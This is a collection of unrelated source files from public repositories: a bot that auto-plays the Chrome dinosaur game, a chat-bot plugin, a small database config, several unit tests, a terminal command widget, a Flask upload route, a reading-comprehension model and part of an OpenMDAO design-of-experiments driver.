4a190474fa5033567b41ff69bb8aa80a9f02ee4d
| 1,223
|
pyw
|
Python
|
Dino_Hack/Dino.pyw
|
SoumadeepChoudhury/Projects
|
d68f2c289e047fadfb077c51485474b33a7e1498
|
[
"MIT"
] | 1
|
2021-10-05T03:03:19.000Z
|
2021-10-05T03:03:19.000Z
|
Dino_Hack/Dino.pyw
|
SoumadeepChoudhury/Projects
|
d68f2c289e047fadfb077c51485474b33a7e1498
|
[
"MIT"
] | null | null | null |
Dino_Hack/Dino.pyw
|
SoumadeepChoudhury/Projects
|
d68f2c289e047fadfb077c51485474b33a7e1498
|
[
"MIT"
] | null | null | null |
import pyautogui
from PIL import Image, ImageGrab
import time
def hit(key):
pyautogui.keyDown(key)
# LIGHT
def isCollide(data):
# Check for birds
#for i in range(200, 250):
# for j in range(355, 370):
# if data[i, j] < 171:
# hit("down")
# return
# Check for Cactus
for i in range(230, 250):
for j in range(400, 470):
if data[i, j] < 100:
hit("up")
return
return
# DARK
def isCollideDark(data):
# # Check for birds
# for i in range(200, 215):
# for j in range(310, 380):
# if data[i, j] < 171:
# hit("down")
# return
# Check for Cactus
for i in range(230, 250):
for j in range(400, 470):
if data[i, j] > 150:
hit("up")
return
return
if __name__ == "__main__":
print("Let's Start in 2 sec...")
time.sleep(2)
hit('up')
while True:
image = ImageGrab.grab().convert('L')
data = image.load()
if data[15, 110] > 200:
isCollide(data)
else:
isCollideDark(data)
| 21.086207
| 50
| 0.464432
|
4a1905357b6c4c0668900a89a5f97c9ed4e93740
| 928
|
py
|
Python
|
nonebot_plugin_heybox/__init__.py
|
SimonHurricane5/nonebot_plugin_heybox
|
6c2b68bc35b0ae3908565ce9483fe622276dfd5c
|
[
"MIT"
] | 1
|
2022-02-16T04:57:48.000Z
|
2022-02-16T04:57:48.000Z
|
nonebot_plugin_heybox/__init__.py
|
SimonHurricane5/nonebot_plugin_heybox
|
6c2b68bc35b0ae3908565ce9483fe622276dfd5c
|
[
"MIT"
] | null | null | null |
nonebot_plugin_heybox/__init__.py
|
SimonHurricane5/nonebot_plugin_heybox
|
6c2b68bc35b0ae3908565ce9483fe622276dfd5c
|
[
"MIT"
] | null | null | null |
from nonebot.params import State, CommandArg
from nonebot import on_command, on_regex, on_keyword
from nonebot.adapters.onebot.v11 import Bot, MessageEvent, GROUP, MessageSegment, Event, Message, GroupMessageEvent
from .heybox_crawler import *
heybox_search = on_command("小黑盒搜",aliases={"查游戏","查史低"}, priority=46, block=True)
heybox_lowest = on_command("小黑盒史低", priority=46, block=True)
@heybox_search.handle()
async def _(bot: Bot, event: GroupMessageEvent, args: Message = CommandArg()):
game_name = args.extract_plain_text().strip()
if not game_name:
await heybox_search.finish("请输入你要查询的游戏名称捏~")
else:
result = heybox_search_crawler(game_name)
await heybox_search.finish(result)
# @heybox_lowest.handle()
# async def _(bot: Bot, event: GroupMessageEvent, args: Message = CommandArg()):
#
# msg = heybox_lowest_crawler()
# await heybox_lowest.finish(msg)
| 38.666667
| 116
| 0.724138
|
4a190584f5f6769566df3c0c772785776f28fd7d
| 59
|
py
|
Python
|
web/mysql_config.py
|
semodi/arxiv_app
|
e33e8e1eae96e25cf41d4169dca82d88615e5d08
|
[
"BSD-3-Clause"
] | 1
|
2022-02-08T19:55:19.000Z
|
2022-02-08T19:55:19.000Z
|
web/mysql_config.py
|
semodi/paper-scraper
|
e33e8e1eae96e25cf41d4169dca82d88615e5d08
|
[
"BSD-3-Clause"
] | null | null | null |
web/mysql_config.py
|
semodi/paper-scraper
|
e33e8e1eae96e25cf41d4169dca82d88615e5d08
|
[
"BSD-3-Clause"
] | null | null | null |
host = 'db'
name = 'root'
password ='mypassword'
port=3306
| 11.8
| 22
| 0.677966
|
4a1906b7ca79a64ceba13d19eb3154baf24b2a37
| 1,469
|
py
|
Python
|
test/test_modify_contact.py
|
kochetov-a/python_training
|
20cb104dea8b743c576b8c02a4dedc13679ff384
|
[
"Apache-2.0"
] | null | null | null |
test/test_modify_contact.py
|
kochetov-a/python_training
|
20cb104dea8b743c576b8c02a4dedc13679ff384
|
[
"Apache-2.0"
] | null | null | null |
test/test_modify_contact.py
|
kochetov-a/python_training
|
20cb104dea8b743c576b8c02a4dedc13679ff384
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from model.contact import Contact
from random import *
# Модификация случайного контакта из списка
def test_modify_contact_by_index(app, db, check_ui):
if len(db.get_contact_list()) == 0: # Получаем из БД список контактов
app.contact.create(Contact(first_name="Contact Test", last_name="Test Contact")) # Если список пустой,создаём новый контакт
contact = Contact(first_name="first_name_test", last_name="last_name_test") # Новые параметры для контакта
old_contacts = db.get_contact_list() # Сохранение списка контактов из БД до модификации
index = randrange(len(old_contacts)) # Получение номера случайного контакта
contact.id = old_contacts[index].id # Сохраняем id первого контакта
app.contact.modify_contact_by_id(contact.id, contact) # Модифицируем выбранный контакт из списка
new_contacts = db.get_contact_list() # Сохранение списка контактов ПОСЛЕ модификации
old_contacts[index] = contact # Добавление новых параметров контакту по id
# Сравниваем отсортированные по ключу (id) списки контактов
assert sorted(old_contacts, key=Contact.id_or_max) == sorted(new_contacts, key=Contact.id_or_max)
if check_ui: # Включение проверки графического интерфейса при наличии ключа "--check_ui"
# Сравниваем отсортированные по ключу (id) списки контактов
assert sorted(new_contacts, key=Contact.id_or_max) == sorted(app.contact.get_contact_list(), key=Contact.id_or_max)
| 66.772727
| 132
| 0.761743
|
4a19088e1e283d70a5d48f36ef4b1606eb035051
| 6,997
|
py
|
Python
|
unittests/test_dataset_creation/test_image_transformations/test_patching.py
|
imsb-uke/ecarenet
|
ffbf24e740d9154312d02b9f775816ed4b3d4691
|
[
"MIT"
] | 1
|
2022-01-25T09:49:45.000Z
|
2022-01-25T09:49:45.000Z
|
unittests/test_dataset_creation/test_image_transformations/test_patching.py
|
imsb-uke/ecarenet
|
ffbf24e740d9154312d02b9f775816ed4b3d4691
|
[
"MIT"
] | null | null | null |
unittests/test_dataset_creation/test_image_transformations/test_patching.py
|
imsb-uke/ecarenet
|
ffbf24e740d9154312d02b9f775816ed4b3d4691
|
[
"MIT"
] | null | null | null |
import unittest
from matplotlib import pyplot as plt
import tensorflow as tf
import os
import numpy as np
from dataset_creation.image_transformations.patching import create_patches, advanced_patching, tf_create_patches
from unittests.unittest_helpers import create_image_label_dataset
class TestPatching(unittest.TestCase):
def test_create_patches(self):
"""
test that takes as input an image and cuts it into patches.
Different sorting orders for patches are available and all tested here.
Everywhere the resulting shape of the patches is known and tested for.
"""
debug = True # False # if set to True, will plot patches
# read an image
directory = os.path.abspath(
os.path.join(os.path.dirname(__file__), '..', '..', '..', 'unittest_data', 'example_colors'))
image = tf.io.read_file(os.path.join(directory, "img_red_0.png"))
image = tf.image.decode_image(image, 3)
image = tf.cast(image, dtype=tf.dtypes.float32)
image = tf.image.resize(image, (2048, 2048))
image = image.numpy()
# test with order = ranked
patches, idx_v, idx_h, _ = create_patches(image, 512, 0, 0, n_patches=4, order='ranked')
self.assertEqual(patches.shape, (4, 512, 512, 3))
# test with order = original
patches, idx_v, idx_h, _ = create_patches(image, 512, 0, 0, order='original')
self.assertTrue(len(idx_v) == len(idx_h) == 16)
self.assertEqual(patches.shape, (16, 512, 512, 3))
self.assertFalse(np.all(patches[-1] == [33, 22, 17]))
# the indices of patches that are returned are supposed to be in original order here
self.assertTrue(np.all(idx_h == np.array([0, 512, 1024, 1536,
0, 512, 1024, 1536,
0, 512, 1024, 1536,
0, 512, 1024, 1536])))
self.assertTrue(np.all(idx_v == np.array([0, 0, 0, 0,
512, 512, 512, 512,
1024, 1024, 1024, 1024,
1536, 1536, 1536, 1536])))
if debug:
for i in range(len(patches)):
ax = plt.subplot(4, 4, i + 1)
ax.axis('off')
ax.imshow(patches[i] / 255)
plt.show()
# test with order = shuffle
patches, idx_v, idx_h, _ = create_patches(image, 512, 0, 0, n_patches=9, order='shuffle')
self.assertTrue(len(idx_v) == len(idx_h) == 9)
def test_create_patches_overlap(self):
"""
test that takes as input an image and cuts it into patches.
Different sorting orders for patches are available and all tested here.
Everywhere the resulting shape of the patches is known and tested for.
"""
debug = False # if set to True, plots patches
# read an image
directory = os.path.abspath(
os.path.join(os.path.dirname(__file__), '..', '..', '..', 'unittest_data', 'example_colors'))
image = tf.io.read_file(os.path.join(directory, "img_red_0.png"))
image = tf.image.decode_image(image, 3)
image = tf.cast(image, dtype=tf.dtypes.float32)
image = tf.image.resize(image, (2048, 2048))
image = image.numpy()
# test with order = ranked
patches, idx_v, idx_h, _ = create_patches(image, 512, 16, 16, n_patches=16, order='ranked')
self.assertEqual(patches.shape, (16, 512, 512, 3))
# test with order = original
patches, idx_v, idx_h, _ = create_patches(image, 512, 16, 16, n_patches=16, order='original')
self.assertTrue(len(idx_v) == len(idx_h) == 16)
self.assertEqual(patches.shape, (16, 512, 512, 3))
if debug:
for i in range(len(patches)):
ax = plt.subplot(5, 5, i + 1)
ax.axis('off')
ax.imshow(patches[i] / 255)
plt.show()
# the indices of patches that are returned are supposed to be in original order here
self.assertTrue(np.all(idx_h == np.array([0, 512-16, 1024-32, 1536-48, 2048-64,
0, 512-16, 1024-32, 1536-48, 2048-64,
0, 512-16, 1024-32, 1536-48, 2048-64,
0])))
self.assertTrue(np.all(idx_v == np.array([0, 0, 0, 0, 0,
512-16, 512-16, 512-16, 512-16, 512-16,
1024-32, 1024-32, 1024-32, 1024-32, 1024-32,
1536-48])))
# test with order = shuffle
patches, idx_v, idx_h, _ = create_patches(image, 512, 16, 16, n_patches=9, order='shuffle')
self.assertTrue(len(idx_v) == len(idx_h) == 9)
# test with order = shuffle_ranked
patches, idx_v, idx_h, _ = create_patches(image, 512, 16, 16, n_patches=9, order='shuffle_ranked')
self.assertTrue(len(idx_v) == len(idx_h) == 9)
# test with more patches than usually cut (extend with white patches)
patches, idx_v, idx_h, _ = create_patches(image, 512, 16, 16, n_patches=30, order='ranked')
self.assertTrue(len(idx_v) == len(idx_h) == 30)
if debug:
for i in range(30):
plt.subplot(5, 6, i + 1)
plt.imshow(patches[i] / 255)
plt.axis('off')
plt.show()
def test_create_patches_map(self):
"""
test if patching function also works with tensorflow mapping function, since this can cause some problems
otherwise
"""
# create a dataset with an image and an artificial label
labelin = "3"
patch_size = 512
overlap = 0
n_patches = 16
order = 'original'
dataset = create_image_label_dataset(1, labelin)
# apply pathing function
dataset = dataset.map(lambda x, y: (tf_create_patches(x, patch_size, overlap, overlap, n_patches, order, 3)[0], y))
for d in dataset.take(1):
self.assertEqual(d[0].shape, (n_patches, 512, 512, 3))
def test_advanced_patching(self):
"""
test the function advanced_patching separately
"""
directory = os.path.abspath(
os.path.join(os.path.dirname(__file__), '..', '..', '..', 'unittest_data', 'example_colors'))
image = tf.io.read_file(os.path.join(directory, "img_red_0.png"))
image = tf.image.decode_image(image, 3)
image = tf.cast(image, dtype=tf.dtypes.float32)
image = image.numpy()
patch_size = 500
n_patches = 4
patches, _, _, _ = advanced_patching(image, patch_size, n_patches, order='ranked')
self.assertEqual(patches.shape, (4, 500, 500, 3))
| 46.646667
| 123
| 0.556381
|
4a190a29935ae4dfc42e4f51ec71fa881f9b2dbc
| 3,809
|
py
|
Python
|
mitzasql/ui/widgets/command_edit.py
|
vladbalmos/mitzasql
|
06c2a96eb4494095b2b72bc1454199a4940b0700
|
[
"MIT"
] | 69
|
2019-05-16T06:40:18.000Z
|
2022-03-24T06:23:49.000Z
|
mitzasql/ui/widgets/command_edit.py
|
vladbalmos/mitzasql
|
06c2a96eb4494095b2b72bc1454199a4940b0700
|
[
"MIT"
] | 36
|
2019-05-15T19:55:24.000Z
|
2021-07-22T07:07:14.000Z
|
mitzasql/ui/widgets/command_edit.py
|
vladbalmos/mitzasql
|
06c2a96eb4494095b2b72bc1454199a4940b0700
|
[
"MIT"
] | 8
|
2019-05-16T06:56:28.000Z
|
2022-02-11T02:24:12.000Z
|
# Copyright (c) 2021 Vlad Balmos <vladbalmos@yahoo.com>
# Author: Vlad Balmos <vladbalmos@yahoo.com>
# See LICENSE file
import urwid
from .emacs_edit import EmacsEdit
class CommandEdit(EmacsEdit):
'''Implement a basic VIM style command edit widget'''
SIGNAL_CANCEL = 'cancel_edit'
def __init__(self, command_processor):
self._command_processor = command_processor
self._marker = None
super().__init__()
urwid.register_signal(self.__class__, self.SIGNAL_CANCEL)
def set_marker(self, marker):
self.set_caption(marker)
self._marker = marker
def _show_prev_command(self):
item = self._command_processor.history.prev
if not item:
return
self.edit_text = item
self.edit_pos = len(item)
def _show_next_command(self):
item = self._command_processor.history.next
if not item:
return
self.edit_text = item
self.edit_pos = len(item)
def _cancel_edit(self):
urwid.emit_signal(self, self.SIGNAL_CANCEL, self)
def show_last_cmd(self):
last_cmd = self._command_processor.history.last
if not last_cmd:
return
self.edit_text = last_cmd
self.edit_pos = len(last_cmd)
def keypress(self, size, key):
if (key == 'tab' or key == 'shift tab') and self._marker == ':':
if key == 'shift tab':
direction = 'back'
else:
direction = 'forward'
if self._autocomplete(direction):
return None
if key != 'tab' and key != 'shift tab':
self._autocomplete(reset=True)
if key == 'esc':
self._cancel_edit()
return
key = super().keypress(size, key)
if key == 'enter':
text = self.edit_text
marker = self._marker
self._cancel_edit()
self._command_processor.execute(str_cmd_marker=marker,
cmd=text)
return
# Show previous command
if key == 'ctrl p':
self._show_prev_command()
return
# Show next command
if key == 'ctrl n':
self._show_next_command()
return
return key
def _autocomplete(self, direction='forward', reset=False):
if reset is True:
self._command_processor.reset_autocomplete()
return
text = self.edit_text
pos = self.edit_pos
space_pos = text.find(' ')
segments = text.split(' ')
suggestion = None
new_pos = None
# Autocomplete first word
if pos <= len(segments[0]):
if pos <= space_pos or space_pos == -1:
suggestion = self._command_processor.autocomplete(segments[0],
command=True, direction=direction)
if suggestion:
segments[0] = suggestion
new_pos = len(suggestion)
# Autocomplete second word
if pos > space_pos and space_pos > -1:
next_space_pos = text.find(' ', space_pos + 1)
if pos > next_space_pos and next_space_pos > -1:
return
suggestion = self._command_processor.autocomplete(segments[1],
argument=True, command_name=segments[0],
direction=direction)
if suggestion:
segments[1] = suggestion
new_pos = len(segments[0]) + len(suggestion) + 1
if suggestion:
text = ' '.join(segments)
self.edit_text = text
self.edit_pos = new_pos
return True
def reset(self):
self._marker = ''
self.set_caption('')
self.edit_text = ''
| 29.3
| 78
| 0.559727
|
4a190abb645c728c3829bbce7802b6d0e783cb31
| 241
|
py
|
Python
|
abc062/a.py
|
y-sira/atcoder
|
479cb8d219ba812c2b8dc7dcbe8f6241ec3c12a3
|
[
"MIT"
] | null | null | null |
abc062/a.py
|
y-sira/atcoder
|
479cb8d219ba812c2b8dc7dcbe8f6241ec3c12a3
|
[
"MIT"
] | null | null | null |
abc062/a.py
|
y-sira/atcoder
|
479cb8d219ba812c2b8dc7dcbe8f6241ec3c12a3
|
[
"MIT"
] | null | null | null |
x, y = map(int, input().split())
g1 = [1, 3, 5, 7, 8, 10, 12]
g2 = [4, 6, 9, 11]
g3 = [2]
if x in g1 and y in g1:
print('Yes')
elif x in g2 and y in g2:
print('Yes')
elif x in g3 and y in g3:
print('Yes')
else:
print('No')
| 16.066667
| 32
| 0.510373
|
4a190b1f2e75dc5aa77aeebd0e28d4ebe889d837
| 6,593
|
py
|
Python
|
notification/views.py
|
Toflex/notification
|
eb0700d00543fea38f97daa264dc146885192a54
|
[
"MIT"
] | null | null | null |
notification/views.py
|
Toflex/notification
|
eb0700d00543fea38f97daa264dc146885192a54
|
[
"MIT"
] | null | null | null |
notification/views.py
|
Toflex/notification
|
eb0700d00543fea38f97daa264dc146885192a54
|
[
"MIT"
] | null | null | null |
from django.urls import reverse
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponseRedirect, Http404, HttpResponse
from django.template import RequestContext
from django.contrib.auth.decorators import login_required
try:
from django.contrib.syndication.views import feed
except ImportError:
from django.contrib.syndication.views import Feed as feed
from .models import *
from .decorators import basic_auth_required, simple_basic_auth_callback
from .feeds import NoticeUserFeed
@basic_auth_required(realm="Notices Feed", callback_func=simple_basic_auth_callback)
def feed_for_user(request):
"""
An atom feed for all unarchived :model:`notification.Notice`s for a user.
"""
url = "feed/%s" % request.user.username
return feed(request, url, {
"feed": NoticeUserFeed,
})
@login_required
def notices(request):
"""
The main notices index view.
Template: :template:`notification/notices.html`
Context:
notices
A list of :model:`notification.Notice` objects that are not archived
and to be displayed on the site.
"""
notices = Notice.objects.notices_for(request.user, on_site=True)
return render(request, "notification/notices.html", {
"notices": notices,
}, RequestContext(request))
@login_required
def notice_settings(request):
"""
The notice settings view.
Template: :template:`notification/notice_settings.html`
Context:
notice_types
A list of all :model:`notification.NoticeType` objects.
notice_settings
A dictionary containing ``column_headers`` for each ``NOTICE_MEDIA``
and ``rows`` containing a list of dictionaries: ``notice_type``, a
:model:`notification.NoticeType` object and ``cells``, a list of
tuples whose first value is suitable for use in forms and the second
value is ``True`` or ``False`` depending on a ``request.POST``
variable called ``form_label``, whose valid value is ``on``.
"""
notice_types = NoticeType.objects.all()
settings_table = []
for notice_type in notice_types:
settings_row = []
for medium_id, medium_display in NOTICE_MEDIA:
form_label = "%s_%s" % (notice_type.label, medium_id)
setting = get_notification_setting(request.user, notice_type, medium_id)
if request.method == "POST":
if request.POST.get(form_label) == "on":
if not setting.send:
setting.send = True
setting.save()
else:
if setting.send:
setting.send = False
setting.save()
settings_row.append((form_label, setting.send))
settings_table.append({"notice_type": notice_type, "cells": settings_row})
if request.method == "POST":
next_page = request.POST.get("next_page", ".")
return HttpResponseRedirect(next_page)
notice_settings = {
"column_headers": [medium_display for medium_id, medium_display in NOTICE_MEDIA],
"rows": settings_table,
}
context_instance=RequestContext(request)
return render(request, "notification/notice_settings.html", {
"notice_types": notice_types,
"notice_settings": notice_settings,
}, context_instance)
@login_required
def single(request, id, mark_seen=True):
"""
Detail view for a single :model:`notification.Notice`.
Template: :template:`notification/single.html`
Context:
notice
The :model:`notification.Notice` being viewed
Optional arguments:
mark_seen
If ``True``, mark the notice as seen if it isn't
already. Do nothing if ``False``. Default: ``True``.
"""
notice = get_object_or_404(Notice, id=id)
if request.user == notice.recipient:
if mark_seen and notice.unseen:
notice.unseen = False
notice.save()
return render(request, "notification/single.html", {
"notice": notice,
}, RequestContext(request))
raise Http404
@login_required
def archive(request, noticeid=None, next_page=None):
"""
Archive a :model:`notices.Notice` if the requesting user is the
recipient or if the user is a superuser. Returns a
``HttpResponseRedirect`` when complete.
Optional arguments:
noticeid
The ID of the :model:`notices.Notice` to be archived.
next_page
The page to redirect to when done.
"""
if noticeid:
try:
notice = Notice.objects.get(id=noticeid)
if request.user == notice.recipient or request.user.is_superuser:
notice.archive()
else: # you can archive other users' notices
# only if you are superuser.
return HttpResponseRedirect(next_page)
except Notice.DoesNotExist:
return HttpResponseRedirect(next_page)
return HttpResponseRedirect(next_page)
@login_required
def delete(request, noticeid=None, next_page=None):
"""
Delete a :model:`notices.Notice` if the requesting user is the recipient
or if the user is a superuser. Returns a ``HttpResponseRedirect`` when
complete.
Optional arguments:
noticeid
The ID of the :model:`notices.Notice` to be archived.
next_page
The page to redirect to when done.
"""
if noticeid:
try:
notice = Notice.objects.get(id=noticeid)
if request.user == notice.recipient or request.user.is_superuser:
notice.delete()
else: # you can delete other users' notices
# only if you are superuser.
return HttpResponseRedirect(next_page)
except Notice.DoesNotExist:
return HttpResponseRedirect(next_page)
return HttpResponseRedirect(next_page)
@login_required
def mark_all_seen(request):
"""
Mark all unseen notices for the requesting user as seen. Returns a
``HttpResponseRedirect`` when complete.
"""
Notice.objects.notices_for(request.user).update(unseen=False)
return HttpResponseRedirect(reverse("notification_notices"))
@login_required
def unseen_count(reqest):
notice = Notice.objects.unseen_count_for(reqest.user)
return HttpResponse(notice)
| 32.477833
| 89
| 0.637494
|
4a190cb92b155424e1843fc135310b7e6dfb507b
| 243
|
py
|
Python
|
examples/M1/M1_run.py
|
pabloabur/netpyne
|
7763d835eb89b9c3c1d0b49489e215ceaceafd82
|
[
"MIT"
] | 1
|
2018-01-23T00:05:57.000Z
|
2018-01-23T00:05:57.000Z
|
examples/M1/M1_run.py
|
pabloabur/netpyne
|
7763d835eb89b9c3c1d0b49489e215ceaceafd82
|
[
"MIT"
] | 2
|
2019-11-05T00:05:56.000Z
|
2019-11-18T00:16:24.000Z
|
examples/M1/M1_run.py
|
pabloabur/netpyne
|
7763d835eb89b9c3c1d0b49489e215ceaceafd82
|
[
"MIT"
] | null | null | null |
import M1 # import parameters file
from netpyne import sim # import netpyne init module
sim.createSimulateAnalyze(netParams = M1.netParams, simConfig = M1.simConfig) # create and simulate network
# check model output
sim.checkOutput('M1')
| 34.714286
| 108
| 0.786008
|
4a190ceb2abc6d3a9a389aac05e2488fd853f58a
| 1,578
|
py
|
Python
|
app/routes.py
|
joasepul/steganographic_app
|
83ae1821110971b6aa815fea465f3ddf1e717e47
|
[
"MIT"
] | null | null | null |
app/routes.py
|
joasepul/steganographic_app
|
83ae1821110971b6aa815fea465f3ddf1e717e47
|
[
"MIT"
] | null | null | null |
app/routes.py
|
joasepul/steganographic_app
|
83ae1821110971b6aa815fea465f3ddf1e717e47
|
[
"MIT"
] | null | null | null |
from app import app
import os
from flask import render_template
from flask import Flask, request, redirect, send_from_directory
from werkzeug.utils import secure_filename
UPLOAD_FOLDER = './app/templates/'
ALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
# @app.route('/')
# def index():
# return render_template('index.html')
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/', methods=['GET', 'POST'])
def upload_file():
if request.method == 'POST':
# check if the post request has the file part
if 'file' not in request.files:
flash('No file part')
return redirect(request.url)
file = request.files['file']
# if user does not select file, browser also
# submit a empty part without filename
if file.filename == '':
flash('No selected file')
return redirect(request.url)
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
return render_template('uploaded_file.html',
filename=filename)
return '''
<!doctype html>
<title>Upload new File</title>
<h1>Upload new File</h1>
<form method=post enctype=multipart/form-data>
<p><input type=file name=file>
<input type=submit value=Upload>
</form>
'''
| 34.304348
| 74
| 0.624842
|
4a190d47f994819d273f7d41b14b11c48338d3bb
| 2,452
|
py
|
Python
|
examples/reading_comprehension/model.py
|
span11UR/Debias-QA
|
5214cd138ac73696a836dc0b1276e611b29e0e5a
|
[
"Apache-2.0"
] | 3
|
2021-04-13T08:12:50.000Z
|
2021-12-12T04:30:24.000Z
|
examples/reading_comprehension/model.py
|
SeanXiaoyuSun/LUKE-QA-bias-analysis
|
5214cd138ac73696a836dc0b1276e611b29e0e5a
|
[
"Apache-2.0"
] | null | null | null |
examples/reading_comprehension/model.py
|
SeanXiaoyuSun/LUKE-QA-bias-analysis
|
5214cd138ac73696a836dc0b1276e611b29e0e5a
|
[
"Apache-2.0"
] | null | null | null |
import torch.nn as nn
import torch
from torch.nn import CrossEntropyLoss
from luke.model import LukeEntityAwareAttentionModel
from examples.debias_model.config import BertConfig
from ..debias_model.model import BertModel
class LukeForReadingComprehension(LukeEntityAwareAttentionModel):
def __init__(self, args):
super(LukeForReadingComprehension, self).__init__(args.model_config)
self.qa_outputs = nn.Linear(self.config.hidden_size+BertConfig.hidden_size, 2)
self.apply(self.init_weights)
self.debias_network = BertModel()
self.debias_network.load_state_dict(torch.load('debias_model.pt'))
def forward(
self,
word_ids,
word_segment_ids,
word_attention_mask,
entity_ids,
entity_position_ids,
entity_segment_ids,
entity_attention_mask,
start_positions=None,
end_positions=None,
):
encoder_outputs = super(LukeForReadingComprehension, self).forward(
word_ids,
word_segment_ids,
word_attention_mask,
entity_ids,
entity_position_ids,
entity_segment_ids,
entity_attention_mask,
)
debiased_state = self.debias_network(word_ids, word_attention_mask,downstream=False)
word_hidden_states = encoder_outputs[0][:, : word_ids.size(1), :]
logits = self.qa_outputs(torch.cat((word_hidden_states,debiased_state),2))
start_logits, end_logits = logits.split(1, dim=-1)
start_logits = start_logits.squeeze(-1)
end_logits = end_logits.squeeze(-1)
if start_positions is not None and end_positions is not None:
if len(start_positions.size()) > 1:
start_positions = start_positions.squeeze(-1)
if len(end_positions.size()) > 1:
end_positions = end_positions.squeeze(-1)
ignored_index = start_logits.size(1)
start_positions.clamp_(0, ignored_index)
end_positions.clamp_(0, ignored_index)
loss_fct = CrossEntropyLoss(ignore_index=ignored_index)
start_loss = loss_fct(start_logits, start_positions)
end_loss = loss_fct(end_logits, end_positions)
total_loss = (start_loss + end_loss) / 2
outputs = (total_loss,)
else:
outputs = tuple()
return outputs + (start_logits, end_logits,)
| 36.058824
| 93
| 0.65783
|
4a190ee6746dbfc8f8fbb8eeb402d5cf78f56a70
| 10,646
|
py
|
Python
|
openmdao/drivers/doe_driver.py
|
bollwyvl/OpenMDAO
|
4d7a31b2bb39674e2be0d6a13cbe22de3f5353af
|
[
"Apache-2.0"
] | null | null | null |
openmdao/drivers/doe_driver.py
|
bollwyvl/OpenMDAO
|
4d7a31b2bb39674e2be0d6a13cbe22de3f5353af
|
[
"Apache-2.0"
] | null | null | null |
openmdao/drivers/doe_driver.py
|
bollwyvl/OpenMDAO
|
4d7a31b2bb39674e2be0d6a13cbe22de3f5353af
|
[
"Apache-2.0"
] | 1
|
2018-07-27T06:39:15.000Z
|
2018-07-27T06:39:15.000Z
|
"""
Design-of-Experiments Driver.
"""
from __future__ import print_function
import traceback
import inspect
from openmdao.core.driver import Driver, RecordingDebugging
from openmdao.core.analysis_error import AnalysisError
from openmdao.drivers.doe_generators import DOEGenerator, ListGenerator
from openmdao.utils.mpi import MPI
from openmdao.recorders.sqlite_recorder import SqliteRecorder
class DOEDriver(Driver):
"""
Design-of-Experiments Driver.
Attributes
----------
_name : str
The name used to identify this driver in recorded cases.
_recorders : list
List of case recorders that have been added to this driver.
_comm : MPI.Comm or None
MPI communicator object.
_color : int or None
In MPI, the cached color is used to determine which cases to run on this proc.
"""
def __init__(self, generator=None, **kwargs):
"""
Constructor.
Parameters
----------
generator : DOEGenerator, list or None
The case generator or a list of DOE cases.
**kwargs : dict of keyword arguments
Keyword arguments that will be mapped into the Driver options.
"""
# if given a list, create a ListGenerator
if isinstance(generator, list):
generator = ListGenerator(generator)
elif generator and not isinstance(generator, DOEGenerator):
if inspect.isclass(generator):
raise TypeError("DOEDriver requires an instance of DOEGenerator, "
"but a class object was found: %s"
% generator.__name__)
else:
raise TypeError("DOEDriver requires an instance of DOEGenerator, "
"but an instance of %s was found."
% type(generator).__name__)
super(DOEDriver, self).__init__(**kwargs)
if generator is not None:
self.options['generator'] = generator
self._name = ''
self._recorders = []
self._comm = None
self._color = None
def _declare_options(self):
"""
Declare options before kwargs are processed in the init method.
"""
self.options.declare('generator', types=(DOEGenerator), default=DOEGenerator(),
desc='The case generator. If default, no cases are generated.')
self.options.declare('run_parallel', types=bool, default=False,
desc='Set to True to execute cases in parallel.')
self.options.declare('procs_per_model', types=int, default=1, lower=1,
desc='Number of processors to give each model under MPI.')
def _setup_comm(self, comm):
"""
Perform any driver-specific setup of communicators for the model.
Parameters
----------
comm : MPI.Comm or <FakeComm> or None
The communicator for the Problem.
Returns
-------
MPI.Comm or <FakeComm> or None
The communicator for the Problem model.
"""
if MPI and self.options['run_parallel']:
self._comm = comm
procs_per_model = self.options['procs_per_model']
full_size = comm.size
size = full_size // procs_per_model
if full_size != size * procs_per_model:
raise RuntimeError("The total number of processors is not evenly divisible by the "
"specified number of processors per model.\n Provide a "
"number of processors that is a multiple of %d, or "
"specify a number of processors per model that divides "
"into %d." % (procs_per_model, full_size))
color = self._color = comm.rank % size
model_comm = comm.Split(color)
else:
self._comm = None
model_comm = comm
return model_comm
def _set_name(self):
"""
Set the name of this DOE driver and its case generator.
Returns
-------
str
The name of this DOE driver and its case generator.
"""
generator = self.options['generator']
gen_type = type(generator).__name__.replace('Generator', '')
if gen_type == 'DOEGenerator':
self._name = 'DOEDriver' # Empty generator
else:
self._name = 'DOEDriver_' + gen_type
return self._name
def _get_name(self):
"""
Get the name of this DOE driver and its case generator.
Returns
-------
str
The name of this DOE driver and its case generator.
"""
return self._name
def run(self):
"""
Generate cases and run the model for each set of generated input values.
Returns
-------
boolean
Failure flag; True if failed to converge, False is successful.
"""
self.iter_count = 0
# set driver name with current generator
self._set_name()
if self._comm:
case_gen = self._parallel_generator
else:
case_gen = self.options['generator']
for case in case_gen(self._designvars, self._problem.model):
self._run_case(case)
self.iter_count += 1
return False
def _run_case(self, case):
"""
Run case, save exception info and mark the metadata if the case fails.
Parameters
----------
case : list
list of name, value tuples for the design variables.
"""
metadata = {}
for dv_name, dv_val in case:
try:
msg = None
self.set_design_var(dv_name, dv_val)
except ValueError as err:
msg = "Error assigning %s = %s: " % (dv_name, dv_val) + str(err)
finally:
if msg:
raise(ValueError(msg))
with RecordingDebugging(self._get_name(), self.iter_count, self) as rec:
try:
self._problem.model.run_solve_nonlinear()
metadata['success'] = 1
metadata['msg'] = ''
except AnalysisError:
metadata['success'] = 0
metadata['msg'] = traceback.format_exc()
except Exception:
metadata['success'] = 0
metadata['msg'] = traceback.format_exc()
print(metadata['msg'])
# save reference to metadata for use in record_iteration
self._metadata = metadata
def _parallel_generator(self, design_vars, model=None):
"""
Generate case for this processor when running under MPI.
Parameters
----------
design_vars : dict
Dictionary of design variables for which to generate values.
model : Group
The model containing the design variables (used by some generators).
Yields
------
list
list of name, value tuples for the design variables.
"""
size = self._comm.size // self.options['procs_per_model']
color = self._color
generator = self.options['generator']
for i, case in enumerate(generator(design_vars, model)):
if i % size == color:
yield case
def add_recorder(self, recorder):
"""
